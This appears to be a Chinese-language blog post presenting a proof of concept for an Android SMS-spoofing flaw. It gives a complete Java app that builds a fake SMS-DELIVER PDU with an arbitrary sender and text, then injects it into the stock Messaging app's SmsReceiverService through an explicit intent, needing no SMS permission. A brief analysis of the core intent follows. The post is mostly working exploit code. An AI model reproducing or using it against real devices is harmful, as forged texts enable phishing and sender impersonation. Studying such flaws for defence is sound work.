0x01 這個是大名鼎鼎的蔣教授發現的 Android 短信偽造問題,原理簡單,有點意思




0x02 代碼實現



package com.smstrick;

 

import android.app.Activity;
import android.content.Context;
import android.content.Intent;
import android.os.Bundle;
import android.telephony.PhoneNumberUtils;
import android.util.Log;
import android.view.View;
import android.view.View.OnClickListener;
import android.widget.EditText;

import java.io.ByteArrayOutputStream;
import java.io.IOException;
import java.lang.reflect.Method;
import java.util.Calendar;
import java.util.GregorianCalendar;

 

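/**
 * Proof of concept for the Android "SMS spoofing" weakness: on affected builds the stock
 * Messaging app ({@code com.android.mms}) could be handed an explicit intent carrying a
 * hand-built SMS-DELIVER PDU under the SMS_RECEIVED action, and it displayed the message as a
 * genuine incoming text. This app declares no SMS permission at all; the only trick is naming
 * the receiver service outright instead of sending the (system-only) broadcast, so the checks
 * that guard the real broadcast are presumably never consulted.
 *
 * <p>NOTE(review): the target component is hard-coded. Where it is absent, no longer exported,
 * or validates its caller (reportedly the case on later Android releases), the injection simply
 * fails and is logged. Use only on devices you own or are authorised to test.
 */
public class SMSTrickActivity extends Activity implements OnClickListener {
    /** Log tag, kept from the original sketch. */
    private static final String TAG = "ice";
    /** Sender used when the input field is left blank; TP-OA must not be empty. */
    private static final String DEFAULT_SENDER = "123456";
    /** Placeholder SMSC address written in front of the TPDU (all zeros in the original). */
    private static final String DUMMY_SMSC = "0000000000";

    /** Called when the activity is first created: inflates the layout and wires the button. */
    @Override
    public void onCreate(Bundle savedInstanceState) {
        super.onCreate(savedInstanceState);
        setContentView(R.layout.main);
        View continueButton = findViewById(R.id.button1);
        continueButton.setOnClickListener(this);
    }

    /** Reads sender and message text from the two fields and injects them as a fake SMS. */
    @Override
    public void onClick(View v) {
        EditText senderField = (EditText) findViewById(R.id.editText1);
        EditText bodyField = (EditText) findViewById(R.id.editText2);
        String sender = senderField.getText().toString();
        String body = bodyField.getText().toString();
        if (sender.isEmpty()) {
            sender = DEFAULT_SENDER;
        }
        createFakeSms(getApplicationContext(), sender, body);
    }

    /**
     * Builds an SMS-DELIVER PDU for {@code body} from {@code sender} and starts the Messaging
     * app's receiver service with it, so the text shows up as if received over the air.
     *
     * @param context application context used to start the service
     * @param sender  originating address; '+', '-' and spaces are tolerated because the
     *                TP-OA length is derived from the encoded digits, not from the raw string
     * @param body    message text, packed as GSM 7-bit via the hidden GsmAlphabet class
     */
    private static void createFakeSms(Context context, String sender, String body) {
        // Source: http://stackoverflow.com/a/12338541
        // Source: http://blog.dev001.net/post/14085892020/android-generate-incoming-sms-from-within-your-app
        byte[] pdu = buildDeliverPdu(sender, body);
        if (pdu == null) {
            // A truncated PDU would only confuse the receiver; abort instead of sending it.
            Log.e(TAG, "could not build SMS-DELIVER PDU; nothing sent");
            return;
        }

        // Explicit component, not a broadcast: this is the whole trick.
        Intent intent = new Intent();
        intent.setClassName("com.android.mms", "com.android.mms.transaction.SmsReceiverService");
        intent.setAction("android.provider.Telephony.SMS_RECEIVED");
        intent.putExtra("pdus", new Object[] { pdu });
        // NOTE(review): the original left `intent.putExtra("format", "3gpp")` commented out;
        // some receiver versions may expect it — confirm on the target build.
        try {
            context.startService(intent);
        } catch (SecurityException e) {
            // Service not reachable from this uid (e.g. no longer exported); nothing more to do.
            Log.e(TAG, "SmsReceiverService refused the intent", e);
        }
    }

    /**
     * Assembles SMSC address + SMS-DELIVER TPDU (3GPP TS 23.040 layout):
     * [SCA len][SCA][first octet][TP-OA len][TP-OA][TP-PID][TP-DCS][TP-SCTS][TP-UDL+TP-UD].
     *
     * @return the PDU bytes, or null when the address or body could not be encoded
     */
    private static byte[] buildDeliverPdu(String sender, String body) {
        byte[] smscBytes = PhoneNumberUtils.networkPortionToCalledPartyBCD(DUMMY_SMSC);
        byte[] senderBytes = PhoneNumberUtils.networkPortionToCalledPartyBCD(sender);
        // Both arrays are TOA octet + BCD digits; a sender with no digits yields nothing usable.
        if (smscBytes == null || senderBytes == null || senderBytes.length < 2) {
            return null;
        }
        byte[] userData = packGsm7Bit(body);
        if (userData == null) {
            return null;
        }

        // write(byte[], int, int) on ByteArrayOutputStream declares no IOException.
        ByteArrayOutputStream out = new ByteArrayOutputStream();
        out.write(smscBytes.length);                 // SCA length counts the TOA octet too
        out.write(smscBytes, 0, smscBytes.length);
        out.write(0x04);                             // TP-MTI = SMS-DELIVER, TP-MMS bit set
        out.write(bcdDigitCount(senderBytes));       // TP-OA length is in digits, not bytes
        out.write(senderBytes, 0, senderBytes.length);
        out.write(0x00);                             // TP-PID: default
        out.write(0x00);                             // TP-DCS: GSM 7-bit default alphabet
        byte[] scts = serviceCentreTimestamp(new GregorianCalendar());
        out.write(scts, 0, scts.length);
        out.write(userData, 0, userData.length);     // TP-UDL septet count + packed septets
        return out.toByteArray();
    }

    /**
     * Number of address digits held in a TOA+BCD array: two per byte after the TOA octet,
     * minus one when the last byte carries the 0xF odd-length filler in its high nibble.
     */
    private static int bcdDigitCount(byte[] toaAndBcd) {
        int digitBytes = toaAndBcd.length - 1;
        int digits = digitBytes * 2;
        if (digitBytes > 0 && (toaAndBcd[toaAndBcd.length - 1] & 0xF0) == 0xF0) {
            digits--;
        }
        return digits;
    }

    /**
     * Encodes TP-SCTS: year (two digits), month, day, hour, minute, second, then the time zone,
     * each as a swapped-nibble BCD octet. The original sketch nibble-swapped the raw binary
     * values (and the full four-digit year cast to a byte), producing an invalid timestamp.
     */
    private static byte[] serviceCentreTimestamp(Calendar calendar) {
        byte[] scts = new byte[7];
        scts[0] = toSwappedBcd(calendar.get(Calendar.YEAR) % 100);
        scts[1] = toSwappedBcd(calendar.get(Calendar.MONTH) + 1);
        scts[2] = toSwappedBcd(calendar.get(Calendar.DAY_OF_MONTH));
        scts[3] = toSwappedBcd(calendar.get(Calendar.HOUR_OF_DAY));
        scts[4] = toSwappedBcd(calendar.get(Calendar.MINUTE));
        scts[5] = toSwappedBcd(calendar.get(Calendar.SECOND));
        scts[6] = timeZoneOctet(calendar);
        return scts;
    }

    /** Time zone in quarter hours as swapped BCD; bit 3 of the octet is the sign (1 = west of UTC). */
    private static byte timeZoneOctet(Calendar calendar) {
        int quarterHours = (calendar.get(Calendar.ZONE_OFFSET) + calendar.get(Calendar.DST_OFFSET))
                / (15 * 60 * 1000);
        int octet = toSwappedBcd(Math.abs(quarterHours)) & 0xFF;
        if (quarterHours < 0) {
            octet |= 0x08;
        }
        return (byte) octet;
    }

    /** Encodes 0..99 as swapped-nibble BCD, e.g. 12 -> 0x21 and 8 -> 0x80. */
    private static byte toSwappedBcd(int value) {
        int tens = (value / 10) & 0x0F;
        int units = value % 10;
        return (byte) ((units << 4) | tens);
    }

    /**
     * Packs {@code body} as GSM 7-bit user data (length septet first) through the hidden
     * {@code com.android.internal.telephony.GsmAlphabet#stringToGsm7BitPacked}.
     *
     * @return the packed bytes, or null if the hidden API is unavailable or fails
     */
    private static byte[] packGsm7Bit(String body) {
        try {
            Class<?> gsmAlphabet = Class.forName("com.android.internal.telephony.GsmAlphabet");
            Method pack = gsmAlphabet.getMethod("stringToGsm7BitPacked", String.class);
            pack.setAccessible(true);
            return (byte[]) pack.invoke(null, body);
        } catch (Exception e) {
            // Reflection raises four checked types, and the hidden API itself may throw
            // unchecked ones on unsupported builds; any of them means "no user data".
            Log.e(TAG, "GsmAlphabet.stringToGsm7BitPacked unavailable", e);
            return null;
        }
    }
}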




0x03 實質分析 核心在於自行構造了系統「收到短信」的 intent(SMS_RECEIVED),並以顯式 intent 直接啟動 com.android.mms 的 SmsReceiverService:






// Explicit intent aimed straight at the Messaging app's receiver service, not a broadcast:
// the component is named outright, so the checks that guard the real SMS_RECEIVED broadcast
// are presumably never applied.
Intent intent = new Intent();

intent.setClassName("com.android.mms",

"com.android.mms.transaction.SmsReceiverService");

// Same action the system uses for a genuine incoming SMS.
intent.setAction("android.provider.Telephony.SMS_RECEIVED");

// The hand-built SMS-DELIVER PDU, in the "pdus" extra the receiver reads.
intent.putExtra("pdus", new Object[] { pdu });

// Left out in the original; some receiver versions may need a "format" extra — confirm on the target build.
//intent.putExtra("format", "3gpp");

// `coNtext` is the garbled spelling of `context` as it appears in the listing above.
coNtext.startService(intent);




由於在受影響的版本上,這個 service 可以被任意 app 直接啟動,它會把送進來的 PDU 當成真正收到的短信處理,從而偽造了短信,而且本 app 不需要申請任何短信權限。據報較新的 Android 版本已修正此問題,該 service 不再接受外部 app 送來的 intent。